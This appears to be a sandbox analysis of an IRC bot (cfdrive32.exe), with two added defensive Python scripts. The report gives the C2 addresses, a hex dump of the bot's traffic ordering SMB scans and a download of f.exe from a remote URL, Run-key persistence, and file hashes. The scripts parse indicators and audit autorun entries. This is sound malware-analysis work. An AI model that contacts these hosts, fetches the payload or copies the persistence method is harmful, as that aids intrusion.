109.196.130.50

Remote Host       Port Number
109.196.130.50    57221
112.78.112.208    80
218.85.133.201    80

IRC commands seen in the session:

MODE #! -ix
MODE #Ma -ix
USER SP2-668 * 0 :COMPUTERNAME
MODE [N00_USA_XP_0519458]@ -ix
MODE #dpi -ix

Outbound traffic was produced on port 57221 (the IRC session with 109.196.130.50). Decoded, the stream shows the bot logging in with PASS and NICK, reporting progress from its scan// module (random and sequential scans of TCP port 445 across 192.x.x.x ranges, with a 5-second delay and 10 to 25 threads) and posting an HTTP SET instruction to channel #i that points at http://208.53.183.171/f.exe:
00000000 | 5041 5353 206C 616F 726F 7372 0D0A 5052 | PASS laorosr..PR
00000010 | 5256 4D53 4720 5B4E 3030 5F55 5341 5F58 | RVMSG [N00_USA_X
00000020 | 505F 3035 3139 BCB9 4020 3A73 6361 6E2F | P_0519..@ :scan/
00000030 | 2F20 5472 7969 6E67 2074 6F20 6765 7420 | / Trying to get
00000040 | 6578 7465 726E 616C 2049 502E 0D0A 5052 | external IP...PR
00000050 | 5256 4D53 4720 5B4E 3030 5F55 5341 5F58 | RVMSG [N00_USA_X
00000060 | 505F 3035 3139 BCB9 4020 3A73 6361 6E2F | P_0519..@ :scan/
00000070 | 2F20 5261 6E64 6F6D 2050 6F72 7420 5363 | / Random Port Sc
00000080 | 616E 2073 7461 7274 6564 206F 6E20 3139 | an started on 19
00000090 | 322E 782E 782E 783A 3434 3520 7769 7468 | 2.x.x.x:445 with
000000A0 | 2061 2064 656C 6179 206F 6620 3520 7365 | a delay of 5 se
000000B0 | 636F 6E64 7320 666F 7220 3020 6D69 6E75 | conds for 0 minu
000000C0 | 7465 7320 7573 696E 6720 3235 2074 6872 | tes using 25 thr
000000D0 | 6561 6473 2E0D 0A50 5252 564D 5347 205B | eads...PRRVMSG [
000000E0 | 4E30 305F 5553 415F 5850 5F30 3531 39BC | N00_USA_XP_0519.
000000F0 | B940 203A 7363 616E 2F2F 2054 7279 696E | .@ :scan// Tryin
00000100 | 6720 746F 2067 6574 2065 7874 6572 6E61 | g to get externa
00000110 | 6C20 4950 2E0D 0A50 5252 564D 5347 205B | l IP...PRRVMSG [
00000120 | 4E30 305F 5553 415F 5850 5F30 3531 39BC | N00_USA_XP_0519.
00000130 | B940 203A 7363 616E 2F2F 2052 616E 646F | .@ :scan// Rando
00000140 | 6D20 506F 7274 2053 6361 6E20 7374 6172 | m Port Scan star
00000150 | 7465 6420 6F6E 2031 3932 2E31 3638 2E78 | ted on 192.168.x
00000160 | 2E78 3A34 3435 2077 6974 6820 6120 6465 | .x:445 with a de
00000170 | 6C61 7920 6F66 2035 2073 6563 6F6E 6473 | lay of 5 seconds
00000180 | 2066 6F72 2030 206D 696E 7574 6573 2075 | for 0 minutes u
00000190 | 7369 6E67 2032 3520 7468 7265 6164 732E | sing 25 threads.
000001A0 | 0D0A 5052 5256 4D53 4720 5B4E 3030 5F55 | ..PRRVMSG [N00_U
000001B0 | 5341 5F58 505F 3035 3139 BCB9 4020 3A73 | SA_XP_0519..@ :s
000001C0 | 6361 6E2F 2F20 5365 7175 656E 7469 616C | can// Sequential
000001D0 | 2050 6F72 7420 5363 616E 2073 7461 7274 | Port Scan start
000001E0 | 6564 206F 6E20 3139 322E 3136 382E 302E | ed on 192.168.0.
000001F0 | 303A 3434 3520 7769 7468 2061 2064 656C | 0:445 with a del
00000200 | 6179 206F 6620 3520 7365 636F 6E64 7320 | ay of 5 seconds
00000210 | 666F 7220 3020 6D69 6E75 7465 7320 7573 | for 0 minutes us
00000220 | 696E 6720 3230 2074 6872 6561 6473 2E0D | ing 20 threads..
00000230 | 0A50 5252 564D 5347 205B 4E30 305F 5553 | .PRRVMSG [N00_US
00000240 | 415F 5850 5F30 3531 39BC B940 203A 7363 | A_XP_0519..@ :sc
00000250 | 616E 2F2F 2053 6571 7565 6E74 6961 6C20 | an// Sequential
00000260 | 506F 7274 2053 6361 6E20 7374 6172 7465 | Port Scan starte
00000270 | 6420 6F6E 2031 3932 2E31 3638 2E38 302E | d on 192.168.80.
00000280 | 303A 3434 3520 7769 7468 2061 2064 656C | 0:445 with a del
00000290 | 6179 206F 6620 3520 7365 636F 6E64 7320 | ay of 5 seconds
000002A0 | 666F 7220 3020 6D69 6E75 7465 7320 7573 | for 0 minutes us
000002B0 | 696E 6720 3230 2074 6872 6561 6473 2E0D | ing 20 threads..
000002C0 | 0A50 5252 564D 5347 205B 4E30 305F 5553 | .PRRVMSG [N00_US
000002D0 | 415F 5850 5F30 3531 39BC B940 203A 7363 | A_XP_0519..@ :sc
000002E0 | 616E 2F2F 2053 6571 7565 6E74 6961 6C20 | an// Sequential
000002F0 | 506F 7274 2053 6361 6E20 7374 6172 7465 | Port Scan starte
00000300 | 6420 6F6E 2031 3932 2E30 2E30 2E30 3A34 | d on 192.0.0.0:4
00000310 | 3435 2077 6974 6820 6120 6465 6C61 7920 | 45 with a delay
00000320 | 6F66 2035 2073 6563 6F6E 6473 2066 6F72 | of 5 seconds for
00000330 | 2030 206D 696E 7574 6573 2075 7369 6E67 | 0 minutes using
00000340 | 2031 3020 7468 7265 6164 732E 0D0A 4E43 | 10 threads...NC
00000350 | 494B 205B 4E30 305F 5553 415F 5850 5F30 | IK [N00_USA_XP_0
00000360 | 3531 3934 3538 5D18 E740 0D0A 7365 6E64 | 519458]..@..send
00000370 | 2023 212C 234D 6120 6F6F 6F6F 0D0A 5052 | #!,#Ma oooo..PR
00000380 | 5256 4D53 4720 2369 203A 4854 5450 2053 | RVMSG #i :HTTP S
00000390 | 4554 2068 7474 703A 2F2F 3230 382E 3533 | ET http://208.53
000003A0 | 2E31 3833 2E31 3731 2F66 2E65 7865 0D0A | .183.171/f.exe..
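
A parser for the capture above, added here as an example (it is not part of the original report or of the sandbox that produced it): it rebuilds the byte stream from the hex column, splits it into IRC lines and pulls out the login password, nick, channel names, scan// parameters and the download URL. The sample rows are constructed: the first thirteen are copied from the dump, the rest were re-hexed by hand from the NICK, send and HTTP SET records so the stream stays contiguous. Two caveats it handles: the ASCII column is lossy, so only the hex is decoded, and the verb on the wire is literally PRRVMSG (bytes 50 52 52 56), so a parser matching the RFC verb PRIVMSG alone would miss every status report.

```python
"""Rebuild the IRC byte stream from a hex dump and extract bot IOCs.
Only the hex column is trusted: the ASCII column is lossy (non-printables
render as '.', and the blog's filter turned some '...' into an ellipsis)."""
import re
from dataclasses import dataclass, field
from typing import List, Optional, Set

# Constructed sample. Rows 0x00-0xC0 are copied from the capture; rows 0xD0
# onward were re-hexed by hand from its NICK/send/HTTP SET records so the
# stream stays contiguous (the remaining scan reports are left out).
SAMPLE_DUMP = """\
00000000 | 5041 5353 206C 616F 726F 7372 0D0A 5052 | PASS laorosr..PR
00000010 | 5256 4D53 4720 5B4E 3030 5F55 5341 5F58 | RVMSG [N00_USA_X
00000020 | 505F 3035 3139 BCB9 4020 3A73 6361 6E2F | P_0519..@ :scan/
00000030 | 2F20 5472 7969 6E67 2074 6F20 6765 7420 | / Trying to get
00000040 | 6578 7465 726E 616C 2049 502E 0D0A 5052 | external IP...PR
00000050 | 5256 4D53 4720 5B4E 3030 5F55 5341 5F58 | RVMSG [N00_USA_X
00000060 | 505F 3035 3139 BCB9 4020 3A73 6361 6E2F | P_0519..@ :scan/
00000070 | 2F20 5261 6E64 6F6D 2050 6F72 7420 5363 | / Random Port Sc
00000080 | 616E 2073 7461 7274 6564 206F 6E20 3139 | an started on 19
00000090 | 322E 782E 782E 783A 3434 3520 7769 7468 | 2.x.x.x:445 with
000000A0 | 2061 2064 656C 6179 206F 6620 3520 7365 |  a delay of 5 se
000000B0 | 636F 6E64 7320 666F 7220 3020 6D69 6E75 | conds for 0 minu
000000C0 | 7465 7320 7573 696E 6720 3235 2074 6872 | tes using 25 thr
000000D0 | 6561 6473 2E0D 0A4E 4943 4B20 5B4E 3030 | eads..NICK [N00
000000E0 | 5F55 5341 5F58 505F 3035 3139 3435 385D | _USA_XP_0519458]
000000F0 | 18E7 400D 0A73 656E 6420 2321 2C23 4D61 | ..@..send #!,#Ma
00000100 | 206F 6F6F 6F0D 0A50 5252 564D 5347 2023 |  oooo..PRRVMSG #
00000110 | 6920 3A48 5454 5020 5345 5420 6874 7470 | i :HTTP SET http
00000120 | 3A2F 2F32 3038 2E35 332E 3138 332E 3137 | ://208.53.183.17
00000130 | 312F 662E 6578 650D 0A                  | 1/f.exe..
"""

HEX_ROW = re.compile(r"^[0-9A-Fa-f]{8}\s*\|\s*([0-9A-Fa-f ]+?)\s*\|")
SCAN_RE = re.compile(
    r"(?P<kind>Random|Sequential) Port Scan started on (?P<target>[\w.]+):(?P<port>\d+) "
    r"with a delay of (?P<delay>\d+) seconds for (?P<minutes>\d+) minutes "
    r"using (?P<threads>\d+) threads")
URL_RE = re.compile(r"https?://[^\s\"'<>]+")
# The verb on the wire is literally PRRVMSG (bytes 50 52 52 56), not PRIVMSG;
# a parser keyed on the RFC verb alone would drop every status report.
MESSAGE_VERBS = {"PRIVMSG", "PRRVMSG", "NOTICE"}


@dataclass
class IrcMessage:
    command: str
    params: List[str]
    trailing: Optional[str]


@dataclass
class BotIocs:
    password: Optional[str] = None
    nick: Optional[str] = None
    channels: Set[str] = field(default_factory=set)
    scans: List[dict] = field(default_factory=list)
    urls: List[str] = field(default_factory=list)


def decode_dump(dump: str) -> bytes:
    """Concatenate the hex column of every dump row into the raw stream."""
    out = bytearray()
    for line in dump.splitlines():
        m = HEX_ROW.match(line.strip())
        if m:                                   # blank/header lines are skipped
            out += bytes.fromhex(m.group(1).replace(" ", ""))
    return bytes(out)


def parse_irc(line: str) -> IrcMessage:
    """Split one IRC line into verb, middle params and trailing text."""
    if line.startswith(":"):                    # optional prefix (server lines)
        _, _, line = line.partition(" ")
    head, sep, trailing = line.partition(" :")
    parts = [p for p in head.split(" ") if p] or [""]
    return IrcMessage(parts[0].upper(), parts[1:], trailing if sep else None)


def extract_iocs(stream: bytes) -> BotIocs:
    """Walk the CRLF-delimited lines and collect login, channels, scans, URLs."""
    iocs = BotIocs()
    for raw in stream.split(b"\r\n"):
        if not raw:
            continue
        msg = parse_irc(raw.decode("latin-1"))  # latin-1 round-trips any byte
        if msg.command == "PASS" and msg.params:
            iocs.password = msg.params[0]
        elif msg.command == "NICK" and msg.params:
            iocs.nick = msg.params[0]
        elif msg.command in MESSAGE_VERBS and msg.trailing:
            m = SCAN_RE.search(msg.trailing)
            if m:
                iocs.scans.append({k: int(v) if v.isdigit() else v
                                   for k, v in m.groupdict().items()})
            iocs.urls.extend(URL_RE.findall(msg.trailing))
        # Channel names appear as middle params (MODE, message targets) and in
        # the bot's own "send #!,#Ma" command, so harvest them from any verb.
        for param in msg.params:
            iocs.channels.update(c for c in param.split(",") if c.startswith("#"))
    return iocs


def analyze_dump(dump: str) -> BotIocs:
    return extract_iocs(decode_dump(dump))
```

Run `analyze_dump(SAMPLE_DUMP)` to get the password `laorosr`, the nick (with its two non-printable bytes preserved via latin-1), the channels `#!`, `#Ma` and `#i`, the parsed scan parameters and the f.exe URL. The regexes are pinned to the exact status strings in this capture; other variants of the bot would need their own patterns.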

* The data identified by the following URLs was then requested from the remote web server:
o http://www.nippon.to/cgi-bin/prxjdg.cgi
o http://www.cooleasy.com/cgi-bin/prxjdg.cgi

Both are public proxy-judge scripts that echo the caller's connection details back to it; this is how the bot learns its external IP address, matching the "Trying to get external IP" status message in the capture.

Other details

* The following ports were open in the system:

Port  Protocol  Process
1053  TCP       cfdrive32.exe (%Windir%\cfdrive32.exe)
1055  TCP       cfdrive32.exe (%Windir%\cfdrive32.exe)
2259  TCP       cfdrive32.exe (%Windir%\cfdrive32.exe)
2260  TCP       cfdrive32.exe (%Windir%\cfdrive32.exe)
2261  TCP       cfdrive32.exe (%Windir%\cfdrive32.exe)
2262  TCP       cfdrive32.exe (%Windir%\cfdrive32.exe)
2272  TCP       cfdrive32.exe (%Windir%\cfdrive32.exe)
2273  TCP       cfdrive32.exe (%Windir%\cfdrive32.exe)
2274  TCP       cfdrive32.exe (%Windir%\cfdrive32.exe)
2275  TCP       cfdrive32.exe (%Windir%\cfdrive32.exe)
2276  TCP       cfdrive32.exe (%Windir%\cfdrive32.exe)
2277  TCP       cfdrive32.exe (%Windir%\cfdrive32.exe)
2278  TCP       cfdrive32.exe (%Windir%\cfdrive32.exe)

Registry Modifications

* The following Registry Keys were created:
o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer
o HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run

* The newly created Registry Values are:
o [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run]
+ Microsoft Driver Setup = "%Windir%\cfdrive32.exe"

so that cfdrive32.exe runs every time Windows starts
o [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
+ Microsoft Driver Setup = "%Windir%\cfdrive32.exe"

so that cfdrive32.exe runs every time Windows starts
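
To check a host, or an offline hive export, for this persistence pattern, here is an added audit script (not from the report or the sandbox that produced it). It parses a `reg export` text file, picks out the Run and policies\Explorer\Run keys and flags entries on four heuristics: an executable sitting directly in the Windows directory root, a Microsoft-sounding display name whose binary lives outside System32 or Program Files, use of the policies\Explorer\Run key (seldom populated outside Group Policy deployments) and the same image registered in more than one autorun key. The sample export is constructed: it holds the report's two values with %Windir% expanded to C:\WINDOWS (an assumption), plus a benign VMware Tools entry and a non-autorun key for contrast.

```python
"""Audit autorun entries in a Windows .reg export for the persistence pattern
in this report: a binary dropped into %Windir% and registered under both
CurrentVersion\\Run and policies\\Explorer\\Run with a Microsoft-sounding name."""
import re
from collections import Counter
from typing import Dict, List

# Constructed sample export: the report's two values with %Windir% expanded to
# C:\WINDOWS (an assumption), plus a benign entry and a non-autorun key.
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Microsoft Driver Setup"="C:\\WINDOWS\\cfdrive32.exe"
"VMware Tools"="\"C:\\Program Files\\VMware\\VMware Tools\\VMwareTray.exe\""

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run]
"Microsoft Driver Setup"="C:\\WINDOWS\\cfdrive32.exe"

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer]
"ShellState"=hex:24,00,00,00
'''

VALUE_RE = re.compile(r'^"((?:[^"\\]|\\.)*)"=(.*)$')   # "name"=<data>
AUTORUN_SUFFIXES = (                                     # compared case-insensitively
    r"\software\microsoft\windows\currentversion\run",
    r"\software\microsoft\windows\currentversion\policies\explorer\run",
)
# Heuristic: directories where a "Microsoft ..." autorun would normally live.
TRUSTED_PREFIXES = ("c:\\windows\\system32\\", "c:\\program files\\",
                    "c:\\program files (x86)\\")


def unescape(s: str) -> str:
    # .reg files escape backslash and double quote with a backslash
    return re.sub(r"\\(.)", r"\1", s)


def parse_reg_export(text: str) -> Dict[str, Dict[str, str]]:
    """Return {key: {value_name: string}} for REG_SZ values; other types skipped."""
    keys: Dict[str, Dict[str, str]] = {}
    current = None
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            keys.setdefault(current, {})
            continue
        m = VALUE_RE.match(line)
        if current is None or not m:
            continue                        # header, blank, comment or default value
        name, data = m.group(1), m.group(2)
        if len(data) >= 2 and data.startswith('"') and data.endswith('"'):
            keys[current][unescape(name)] = unescape(data[1:-1])  # REG_SZ only
    return keys


def is_autorun_key(key: str) -> bool:
    return key.lower().endswith(AUTORUN_SUFFIXES)


def image_path(command: str) -> str:
    """First token of a launch command: a quoted path, or up to the first space."""
    command = command.strip()
    if command.startswith('"'):
        end = command.find('"', 1)
        return command[1:end] if end > 0 else command[1:]
    return command.split(" ", 1)[0]


def in_windows_root(path: str) -> bool:
    """True for C:\\WINDOWS\\x.exe, False for C:\\WINDOWS\\system32\\x.exe."""
    parts = path.lower().split("\\")
    return len(parts) == 3 and parts[1] in ("windows", "winnt") and parts[2].endswith(".exe")


def audit(text: str) -> List[dict]:
    """Apply the heuristics to every Run / policies\\Explorer\\Run value."""
    entries = [(key, name, cmd) for key, values in parse_reg_export(text).items()
               if is_autorun_key(key) for name, cmd in values.items()]
    seen = Counter(image_path(cmd).lower() for _, _, cmd in entries)
    findings = []
    for key, name, cmd in entries:
        path = image_path(cmd)
        reasons = []
        if in_windows_root(path):
            reasons.append("exe-in-windows-root")
        if "microsoft" in name.lower() and not path.lower().startswith(TRUSTED_PREFIXES):
            reasons.append("microsoft-name-outside-trusted-path")
        if key.lower().endswith(r"\policies\explorer\run"):
            reasons.append("policies-explorer-run-key")
        if seen[path.lower()] > 1:
            reasons.append("registered-in-multiple-autorun-keys")
        if reasons:
            findings.append({"key": key, "name": name, "image": path, "reasons": reasons})
    return findings
```

On a live system, `reg export HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion hklm_cv.reg` and feeding the file to `audit()` is enough; both cfdrive32.exe entries trip every heuristic that applies to their key, while the VMware Tools entry passes clean. The heuristics are deliberately simple and will need tuning for hosts where %Windir% is not C:\WINDOWS or where policy-driven autoruns are expected.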

Memory Modifications

* There was a new process created in the system:

Process Name    Process Filename         Main Module Size
cfdrive32.exe   %Windir%\cfdrive32.exe   352,256 bytes

File System Modifications

* The following file was created in the system:

#  Filename(s)                            File Size     File Hash
1  %Windir%\cfdrive32.exe                 86,016 bytes  MD5: 0x91CF319F0936F134818632CB1B124EEA
   [file and pathname of the sample #1]                 SHA-1: 0x58F72A8883077FCF53EB5EB77D4FF3B82CB54926
